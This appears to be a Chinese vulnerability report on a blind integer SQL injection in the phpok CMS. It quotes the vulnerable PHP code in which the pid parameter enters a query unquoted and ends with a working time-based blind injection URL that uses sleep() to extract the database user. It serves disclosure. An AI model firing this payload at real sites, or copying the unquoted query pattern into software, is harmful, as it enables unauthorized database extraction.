phpok最新版sql注入(盲注)

漏洞作者: 路人甲

在framework/www/open_control.php中:

//网址列表,这里读的是项目的网址列表
	function url_f()
	{
		$id = $this->get("id");
		if(!$id) $id = "content";
		$this->assign("id",$id);
		$pid = $this->get("pid");
		if($pid)
		{
			$p_rs = $this->model('project')->get_one($pid);
			$type = $this->get("type");
			if(!$p_rs)
			{
				error_open("项目不存在");
			}
			if($type == "cate" && $p_rs["cate"])
			{
				$catelist = $this->model("cate")->get_all($p_rs['site_id'],$p_rs['cate']);
				$this->assign("rslist",$catelist);
				$this->assign("p_rs",$p_rs);
				$this->view("open_url_cate");
			}
			else
			{
				$pageid = $this->get($this->config["pageid"],"int");
				$psize = $this->config["psize"];
				if(!$psize) $psize = 20;
				if(!$pageid) $pageid = 1;
				$offset = ($pageid - 1) * $psize;
				$pageurl = $this->url("open","url","pid=".$pid."&type=list&id=".$id);
				$condition = "l.site_id='".$p_rs["site_id"]."' AND l.project_id='".$pid."' AND l.parent_id='0' ";
				$keywords = $this->get("keywords");
				if($keywords)
				{
					$condition .= " AND l.title LIKE '%".$keywords."%' ";
					$pageurl .= "&keywords=".rawurlencode($keywords);
					$this->assign("keywords",$keywords);
				}
				$rslist = $this->model('list')->get_list($p_rs["module"],$condition,$offset,$psize,$p_rs["orderby"]);
				if($rslist)
				{
					$sub_idlist = array_keys($rslist);
					$sub_idstring = implode(",",$sub_idlist);
					$con_sub = "l.site_id='".$p_rs["site_id"]."' AND l.project_id='".$pid."' AND l.parent_id IN(".$sub_idstring.") ";
					$sublist = $this->model('list')->get_list($p_rs["module"],$con_sub,0,0,$p_rs["orderby"]);
					if($sublist)
					{
						foreach($sublist AS $key=>$value)
						{
							$rslist[$value["parent_id"]]["sonlist"][$value["id"]] = $value;
						}
					}
				}
				//读子主题
				$total = $this->model('list')->get_total($p_rs["module"],$condition);
				$pagelist = phpok_page($pageurl,$total,$pageid,$psize,"home=首页&prev=上一页&next=下一页&last=尾页&half=5&opt=第(num)页&add=(total)/(psize)&always=1");
				$this->assign("pagelist",$pagelist);
				$this->assign("p_rs",$p_rs);
				$this->assign("rslist",$rslist);
				$this->view("open_url_list");				
			}
		}
		else
		{
			$condition = " p.status='1' ";
			$rslist = $this->model('project')->get_all_project($_SESSION["admin_site_id"],$condition);
			$this->assign("rslist",$rslist);
		}
		$this->assign("id",$id);
		$this->view("open_url");
	}

$pid = $this->get("pid"); 获取参数pid的值,然后调用下面的方法

$p_rs = $this->model('project')->get_one($pid);

//取得项目信息
	function get_one($id,$ext=true)
	{
		if(!$id) return false;
		$sql = "SELECT * FROM ".$this->db->prefix."project WHERE id=".$id;
		$rs = $this->db->get_one($sql);
		if(!$rs) return false;
		if($ext)
		{
			$ext_rs = $GLOBALS['app']->model("ext")->get_all("project-".$id);
			if($ext_rs) $rs = array_merge($ext_rs,$rs);
		}
		return $rs;
	}

这里发现$id 虽然做了全局的过滤,但是sql语句中并没有两侧加上引号,这样过滤就没啥意义了,直接可以sql整形注入。

PS: 这里还有一个奇怪的问题,访问页面后发现一只提示模板不存在,后来发现在tpl文件夹下根本就不存在这个open_control.php中所需要的模板。导致sql注入无法回显。不知道是否是开发者忘记了还是这个模块已经取消了。

漏洞证明:

poc:

[php]

/index.php?c=open&f=url&pid=0%20or%20if%28ord%28substr%28user%28%29%2C1%2C1%29%29%3D1%2Csleep%28%200.5%29%2C1%29%3D0

[/php]

发表评论